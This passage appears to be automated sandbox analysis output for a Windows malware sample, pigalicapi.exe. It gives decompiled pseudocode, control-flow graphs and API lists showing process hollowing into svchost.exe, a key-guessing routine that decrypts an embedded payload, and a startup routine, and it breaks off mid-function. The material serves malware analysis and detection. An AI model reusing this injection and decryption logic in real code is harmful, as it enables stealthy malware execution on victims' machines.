                                                                                                                                                                                                                                                                            0x007b218d
                                                                                                                                                                                                                                                                            0x007b2194
                                                                                                                                                                                                                                                                            0x007b21c0
                                                                                                                                                                                                                                                                            0x007b21c8
                                                                                                                                                                                                                                                                            0x007b21fe
                                                                                                                                                                                                                                                                            0x007b2204
                                                                                                                                                                                                                                                                            0x007b2211
                                                                                                                                                                                                                                                                            0x007b227d
                                                                                                                                                                                                                                                                            0x007b228f
                                                                                                                                                                                                                                                                            0x007b2294
                                                                                                                                                                                                                                                                            0x007b2297
                                                                                                                                                                                                                                                                            0x007b22b2
                                                                                                                                                                                                                                                                            0x007b22ce
                                                                                                                                                                                                                                                                            0x007b235e
                                                                                                                                                                                                                                                                            0x007b2363
                                                                                                                                                                                                                                                                            0x007b22d0
                                                                                                                                                                                                                                                                            0x007b2312
                                                                                                                                                                                                                                                                            0x007b2317
                                                                                                                                                                                                                                                                            0x007b2317
                                                                                                                                                                                                                                                                            0x007b22ac
                                                                                                                                                                                                                                                                            0x007b22ac
                                                                                                                                                                                                                                                                            0x007b2376
                                                                                                                                                                                                                                                                            0x007b2396
                                                                                                                                                                                                                                                                            0x007b239e
                                                                                                                                                                                                                                                                            0x007b23ec
                                                                                                                                                                                                                                                                            0x007b23f2
                                                                                                                                                                                                                                                                            0x007b240a
                                                                                                                                                                                                                                                                            0x007b2412
                                                                                                                                                                                                                                                                            0x007b2460
                                                                                                                                                                                                                                                                            0x007b2468
                                                                                                                                                                                                                                                                            0x007b24a6
                                                                                                                                                                                                                                                                            0x007b24ba
                                                                                                                                                                                                                                                                            0x007b24c2
                                                                                                                                                                                                                                                                            0x007b24e2
                                                                                                                                                                                                                                                                            0x007b24ef
                                                                                                                                                                                                                                                                            0x007b24fc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b24fc
                                                                                                                                                                                                                                                                            0x007b24cb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b24d1
                                                                                                                                                                                                                                                                            0x007b2473
                                                                                                                                                                                                                                                                            0x007b2480
                                                                                                                                                                                                                                                                            0x007b248d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2493
                                                                                                                                                                                                                                                                            0x007b241d
                                                                                                                                                                                                                                                                            0x007b242a
                                                                                                                                                                                                                                                                            0x007b2437
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b243d
                                                                                                                                                                                                                                                                            0x007b23a9
                                                                                                                                                                                                                                                                            0x007b23b6
                                                                                                                                                                                                                                                                            0x007b23c3
                                                                                                                                                                                                                                                                            0x007b23d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b23da
                                                                                                                                                                                                                                                                            0x007b2227
                                                                                                                                                                                                                                                                            0x007b222d
                                                                                                                                                                                                                                                                            0x007b223a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2245
                                                                                                                                                                                                                                                                            0x007b2252
                                                                                                                                                                                                                                                                            0x007b225f
                                                                                                                                                                                                                                                                            0x007b2270
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2276
                                                                                                                                                                                                                                                                            0x007b21d5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2196
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2196

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 007B20D4
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 007B20E6
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,007BC38C), ref: 007B20FE
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 007B210F
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 007B2187
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007B21C0
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B21D5
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,007B2080,?,00003000,00000040), ref: 007B21FE
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 007B2227
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 007B2245
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 007B2252
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 007B225F
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B2270
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                            • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                            • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                            • Opcode ID: 93f219f8aa1fff4f01ce8aee89d49f1497e85115ac6538f7fc1838a2029d31e6
                                                                                                                                                                                                                                                                            • Instruction ID: b59da47bd0a0e7ecf6e411653a042f4a1ced8be67bcc232ca7d42cff4e683c66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93f219f8aa1fff4f01ce8aee89d49f1497e85115ac6538f7fc1838a2029d31e6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD151B1E40219EBCB29DF54CC95FAE77B9BF48304F04C598F609A7281D6789A81CF58
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 498 7b47f0-7b4801 499 7b4aab-7b4ab1 498->499 500 7b4807-7b480e 498->500 500->499 501 7b4814-7b4832 CryptAcquireContextA 500->501 502 7b4856-7b485a 501->502 503 7b4834-7b483f GetLastError 501->503 502->499 505 7b4860-7b489d 502->505 503->502 504 7b4841-7b4850 CryptAcquireContextA 503->504 504->502 507 7b4a9f-7b4aa5 CryptReleaseContext 505->507 508 7b48a3-7b48f3 call 7b7b70 CryptCreateHash 505->508 507->499 511 7b48f9-7b4913 CryptHashData 508->511 512 7b4a90-7b4a96 508->512 515 7b4919-7b4944 CryptDeriveKey 511->515 516 7b4a83-7b4a8a CryptDestroyHash 511->516 513 7b4a9a 512->513 514 7b4a98 512->514 513->507 514->507 515->516 517 7b494a-7b498f CryptDecrypt CryptDestroyKey 515->517 516->512 517->516 518 7b4995-7b49b1 CryptCreateHash 517->518 518->516 519 7b49b7-7b49d4 CryptHashData 518->519 520 7b49da-7b4a0f CryptGetHashParam 519->520 521 7b4a76-7b4a7d CryptDestroyHash 519->521 520->521 522 7b4a11-7b4a3c CryptGetHashParam 520->522 521->516 522->521 523 7b4a3e-7b4a58 call 7b7c70 522->523 523->521 526 7b4a5a-7b4a72 call 7b7b70 523->526 526->521
                                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                                            			E007B47F0(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                                                                                                                            				signed int _v5;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				char _v764;
                                                                                                                                                                                                                                                                            				char _v780;
                                                                                                                                                                                                                                                                            				intOrPtr _v784;
                                                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                                                            				int _v792;
                                                                                                                                                                                                                                                                            				int _v796;
                                                                                                                                                                                                                                                                            				intOrPtr _v800;
                                                                                                                                                                                                                                                                            				long* _v804;
                                                                                                                                                                                                                                                                            				int _v808;
                                                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                                                            				char _v816;
                                                                                                                                                                                                                                                                            				int _v820;
                                                                                                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                                                                                                            				char _v828;
                                                                                                                                                                                                                                                                            				char _v844;
                                                                                                                                                                                                                                                                            				int _t61;
                                                                                                                                                                                                                                                                            				char* _t67;
                                                                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                                                            				char* _t73;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                                                            				signed char _t78;
                                                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                            					L25:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                            						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v788 = 0x10;
                                                                                                                                                                                                                                                                            						_v784 = 0x10;
                                                                                                                                                                                                                                                                            						_v792 = 0;
                                                                                                                                                                                                                                                                            						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                            							E007B7B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                            							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                            							_t67 =  &_v780;
                                                                                                                                                                                                                                                                            							_v800 = _t67;
                                                                                                                                                                                                                                                                            							_v796 = 0;
                                                                                                                                                                                                                                                                            							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
                                                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                                                            								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t68 = _v800;
                                                                                                                                                                                                                                                                            							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                            							if(_t68 != 0) {
                                                                                                                                                                                                                                                                            								_v804 = 0;
                                                                                                                                                                                                                                                                            								_t69 = _v796;
                                                                                                                                                                                                                                                                            								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                            								if(_t69 != 0) {
                                                                                                                                                                                                                                                                            									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                            									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                            									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                            									if(_v808 != 0) {
                                                                                                                                                                                                                                                                            										_t73 =  &_v816;
                                                                                                                                                                                                                                                                            										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73); // executed
                                                                                                                                                                                                                                                                            										if(_t73 != 0) {
                                                                                                                                                                                                                                                                            											_t74 = _v816;
                                                                                                                                                                                                                                                                            											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                            											if(_t74 != 0) {
                                                                                                                                                                                                                                                                            												_v820 = 0;
                                                                                                                                                                                                                                                                            												_v824 = 4;
                                                                                                                                                                                                                                                                            												_t76 = _v816;
                                                                                                                                                                                                                                                                            												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                            												if(_t76 != 0) {
                                                                                                                                                                                                                                                                            													_v828 = 0x10;
                                                                                                                                                                                                                                                                            													_t77 = _v816;
                                                                                                                                                                                                                                                                            													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                            													if(_t77 != 0) {
                                                                                                                                                                                                                                                                            														_t78 = E007B7C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                            														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                            														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            															_t52 =  &_a12; // 0x7b4665
                                                                                                                                                                                                                                                                            															E007B7B70( *_t52,  &_v780, 0x300);
                                                                                                                                                                                                                                                                            															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                            															_v5 = 1;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                                                            0x007b47f9
                                                                                                                                                                                                                                                                            0x007b4801
                                                                                                                                                                                                                                                                            0x007b4aab
                                                                                                                                                                                                                                                                            0x007b4ab1
                                                                                                                                                                                                                                                                            0x007b4814
                                                                                                                                                                                                                                                                            0x007b4814
                                                                                                                                                                                                                                                                            0x007b482a
                                                                                                                                                                                                                                                                            0x007b4832
                                                                                                                                                                                                                                                                            0x007b4850
                                                                                                                                                                                                                                                                            0x007b4850
                                                                                                                                                                                                                                                                            0x007b485a
                                                                                                                                                                                                                                                                            0x007b4860
                                                                                                                                                                                                                                                                            0x007b486a
                                                                                                                                                                                                                                                                            0x007b4874
                                                                                                                                                                                                                                                                            0x007b488f
                                                                                                                                                                                                                                                                            0x007b48b9
                                                                                                                                                                                                                                                                            0x007b48be
                                                                                                                                                                                                                                                                            0x007b48c1
                                                                                                                                                                                                                                                                            0x007b48c7
                                                                                                                                                                                                                                                                            0x007b48cd
                                                                                                                                                                                                                                                                            0x007b48eb
                                                                                                                                                                                                                                                                            0x007b48f3
                                                                                                                                                                                                                                                                            0x007b4a90
                                                                                                                                                                                                                                                                            0x007b4a96
                                                                                                                                                                                                                                                                            0x007b4889
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4889
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4a98
                                                                                                                                                                                                                                                                            0x007b48fd
                                                                                                                                                                                                                                                                            0x007b490b
                                                                                                                                                                                                                                                                            0x007b4913
                                                                                                                                                                                                                                                                            0x007b4919
                                                                                                                                                                                                                                                                            0x007b492c
                                                                                                                                                                                                                                                                            0x007b493c
                                                                                                                                                                                                                                                                            0x007b4944
                                                                                                                                                                                                                                                                            0x007b494a
                                                                                                                                                                                                                                                                            0x007b4975
                                                                                                                                                                                                                                                                            0x007b4982
                                                                                                                                                                                                                                                                            0x007b498f
                                                                                                                                                                                                                                                                            0x007b4995
                                                                                                                                                                                                                                                                            0x007b49a9
                                                                                                                                                                                                                                                                            0x007b49b1
                                                                                                                                                                                                                                                                            0x007b49c5
                                                                                                                                                                                                                                                                            0x007b49cc
                                                                                                                                                                                                                                                                            0x007b49d4
                                                                                                                                                                                                                                                                            0x007b49da
                                                                                                                                                                                                                                                                            0x007b49e4
                                                                                                                                                                                                                                                                            0x007b4a00
                                                                                                                                                                                                                                                                            0x007b4a07
                                                                                                                                                                                                                                                                            0x007b4a0f
                                                                                                                                                                                                                                                                            0x007b4a11
                                                                                                                                                                                                                                                                            0x007b4a2d
                                                                                                                                                                                                                                                                            0x007b4a34
                                                                                                                                                                                                                                                                            0x007b4a3c
                                                                                                                                                                                                                                                                            0x007b4a4b
                                                                                                                                                                                                                                                                            0x007b4a50
                                                                                                                                                                                                                                                                            0x007b4a58
                                                                                                                                                                                                                                                                            0x007b4a66
                                                                                                                                                                                                                                                                            0x007b4a6a
                                                                                                                                                                                                                                                                            0x007b4a6f
                                                                                                                                                                                                                                                                            0x007b4a72
                                                                                                                                                                                                                                                                            0x007b4a72
                                                                                                                                                                                                                                                                            0x007b4a58
                                                                                                                                                                                                                                                                            0x007b4a3c
                                                                                                                                                                                                                                                                            0x007b4a0f
                                                                                                                                                                                                                                                                            0x007b4a7d
                                                                                                                                                                                                                                                                            0x007b4a7d
                                                                                                                                                                                                                                                                            0x007b49b1
                                                                                                                                                                                                                                                                            0x007b498f
                                                                                                                                                                                                                                                                            0x007b4944
                                                                                                                                                                                                                                                                            0x007b4a8a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4a8a
                                                                                                                                                                                                                                                                            0x007b4aa5
                                                                                                                                                                                                                                                                            0x007b4aa5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b485a

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B482A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B4834
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B4850
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B48EB
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 007B490B
                                                                                                                                                                                                                                                                            • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 007B493C
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 007B496F
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B4982
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 007B49A9
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 007B49CC
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 007B4A07
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0$eF{
                                                                                                                                                                                                                                                                            • API String ID: 2739279601-647815811
                                                                                                                                                                                                                                                                            • Opcode ID: 57632b685ae25efffb3f202ff6054d859bc88468db9414d232c49c0d42bb1601
                                                                                                                                                                                                                                                                            • Instruction ID: fb6c9457c2b40dcb4ca0cce420e2ea49cd7ae3795925748a862352cb65b27029
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57632b685ae25efffb3f202ff6054d859bc88468db9414d232c49c0d42bb1601
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7710371A50318ABDB26DB54CC99FED777CAB48B00F00C598F609AA1C1DBB99B84CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 626 7b3b00-7b3b5c call 7b1000 call 7b3130 call 7b2ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 7b4510 635 7b400a-7b400c ExitProcess 626->635 636 7b3b62-7b3c8c call 7b7d20 call 7b5700 call 7b5a00 call 7b7d20 call 7b9400 call 7b99f0 call 7b6060 call 7b5e00 StrStrIA call 7b1120 call 7b5e30 call 7b6cf0 call 7b5f30 call 7b9b90 WSAStartup 626->636 636->635 663 7b3c92-7b3cb1 636->663 664 7b3cb3-7b3cbb 663->664 665 7b3cc0-7b3cc9 663->665 664->665 666 7b3ccb-7b3cd4 665->666 667 7b3cda-7b3ce3 665->667 666->667 668 7b3ce5-7b3cee 667->668 669 7b3cf4-7b3cfd 667->669 668->669 670 7b3cff-7b3d07 669->670 671 7b3d0c-7b3d15 669->671 670->671 672 7b3d17-7b3d20 671->672 673 7b3d26-7b3d2f 671->673 672->673 674 7b3d31-7b3d3a 673->674 675 7b3d40-7b3dfd call 7b7d20 call 7ba700 call 7ba4b0 call 7b5b50 call 7b8a70 673->675 674->675 686 7b3e49 675->686 687 7b3dff-7b3e3f call 7b7d20 call 7b78d0 675->687 689 7b3e53-7b3eab call 7b7970 call 7b4020 686->689 687->686 697 7b3f8a 689->697 698 7b3eb1-7b3ed9 call 7b4020 689->698 700 7b3f91-7b3f9a 697->700 704 7b3edf-7b3efa call 7b4020 698->704 705 7b3f81 698->705 702 7b3fed-7b3ffa Sleep 700->702 703 7b3f9c-7b3fa3 700->703 702->689 706 7b3fd0-7b3fd7 703->706 707 7b3fa5-7b3fac 703->707 713 7b3eff-7b3f07 704->713 708 7b3f88 705->708 706->702 712 7b3fd9-7b3fe3 706->712 710 7b3fae-7b3fc2 707->710 711 7b3fc4 707->711 708->700 714 7b3fce 710->714 711->714 712->702 715 7b3f09-7b3f50 call 7b42e0 call 7b4020 713->715 716 7b3f78 713->716 714->702 722 7b3f59-7b3f60 715->722 723 7b3f52 715->723 717 7b3f7f 716->717 717->708 724 7b3f62-7b3f70 VirtualFree 722->724 725 7b3f76 722->725 723->722 724->725 725->717
                                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                                            			_entry_() {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v1148;
                                                                                                                                                                                                                                                                            				signed char _v1149;
                                                                                                                                                                                                                                                                            				intOrPtr _v1156;
                                                                                                                                                                                                                                                                            				char _v1556;
                                                                                                                                                                                                                                                                            				char _v9556;
                                                                                                                                                                                                                                                                            				long _v9560;
                                                                                                                                                                                                                                                                            				char _v9564;
                                                                                                                                                                                                                                                                            				char _v12068;
                                                                                                                                                                                                                                                                            				signed int _v12072;
                                                                                                                                                                                                                                                                            				char _v12076;
                                                                                                                                                                                                                                                                            				long _v12080;
                                                                                                                                                                                                                                                                            				char _v12081;
                                                                                                                                                                                                                                                                            				long _v12088;
                                                                                                                                                                                                                                                                            				long _v12092;
                                                                                                                                                                                                                                                                            				long _v12096;
                                                                                                                                                                                                                                                                            				signed int _v12100;
                                                                                                                                                                                                                                                                            				signed char _v12101;
                                                                                                                                                                                                                                                                            				long _v12108;
                                                                                                                                                                                                                                                                            				signed int _v12112;
                                                                                                                                                                                                                                                                            				void* _v12116;
                                                                                                                                                                                                                                                                            				signed char _t69;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            				signed char _t77;
                                                                                                                                                                                                                                                                            				signed char _t79;
                                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                                            				signed char _t85;
                                                                                                                                                                                                                                                                            				signed char _t86;
                                                                                                                                                                                                                                                                            				signed char _t87;
                                                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                                                            				char* _t89;
                                                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                                            				signed char _t102;
                                                                                                                                                                                                                                                                            				signed char _t104;
                                                                                                                                                                                                                                                                            				signed char _t106;
                                                                                                                                                                                                                                                                            				signed char _t110;
                                                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                                                            				signed int _t118;
                                                                                                                                                                                                                                                                            				char _t125;
                                                                                                                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                                                                                                                            				signed int _t159;
                                                                                                                                                                                                                                                                            				signed int _t161;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E007B1000(0x2f50);
                                                                                                                                                                                                                                                                            				_v8 = E007B3130();
                                                                                                                                                                                                                                                                            				E007B2ED0(_v8);
                                                                                                                                                                                                                                                                            				GetModuleFileNameA(0, "C:\Users\engineer\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E007B5DB0); // executed
                                                                                                                                                                                                                                                                            				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                            				_t69 = E007B4510(_v8, 0x7c3c88); // executed
                                                                                                                                                                                                                                                                            				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                            				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                                                            					ExitProcess(0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E007B7D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                            				E007B5700( &_v1148); // executed
                                                                                                                                                                                                                                                                            				_t143 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            				_t74 = E007B5A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                            				_v1156 = _t74;
                                                                                                                                                                                                                                                                            				E007B7D20(_t74, "Lyoxokxeruqp", 0, 0x12c);
                                                                                                                                                                                                                                                                            				E007B9400( &_v1148, "Lyoxokxeruqp", 0xa); // executed
                                                                                                                                                                                                                                                                            				_t77 = E007B99F0(); // executed
                                                                                                                                                                                                                                                                            				 *0x7c435a = _t77;
                                                                                                                                                                                                                                                                            				 *0x7c435d = E007B6060(); // executed
                                                                                                                                                                                                                                                                            				_t79 = E007B5E00(); // executed
                                                                                                                                                                                                                                                                            				 *0x7c435e = _t79;
                                                                                                                                                                                                                                                                            				_t80 = StrStrIA("C:\Users\engineer\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				 *0x7c4362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                            				E007B1120("C:\Users\engineer\pigalicapi.exe", "pigalicapi",  *0x7c435a & 0x000000ff,  *0x7c4362 & 0x000000ff, 0x7c436c); // executed
                                                                                                                                                                                                                                                                            				_t85 = E007B5E30(0); // executed
                                                                                                                                                                                                                                                                            				 *0x7c435b = _t85;
                                                                                                                                                                                                                                                                            				 *0x7c435f = 1; // executed
                                                                                                                                                                                                                                                                            				_t86 = E007B6CF0(); // executed
                                                                                                                                                                                                                                                                            				_v1149 = _t86;
                                                                                                                                                                                                                                                                            				_t87 = E007B5F30(); // executed
                                                                                                                                                                                                                                                                            				 *0x7c435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                            				_t88 = E007B9B90(0xffffffff);
                                                                                                                                                                                                                                                                            				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                            				 *0x7c4364 = _t88;
                                                                                                                                                                                                                                                                            				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                            				_push(_t89);
                                                                                                                                                                                                                                                                            				_push(0x202); // executed
                                                                                                                                                                                                                                                                            				L007BB1E6(); // executed
                                                                                                                                                                                                                                                                            				if(_t89 != 0) {
                                                                                                                                                                                                                                                                            					goto L39;
                                                                                                                                                                                                                                                                            				} else {
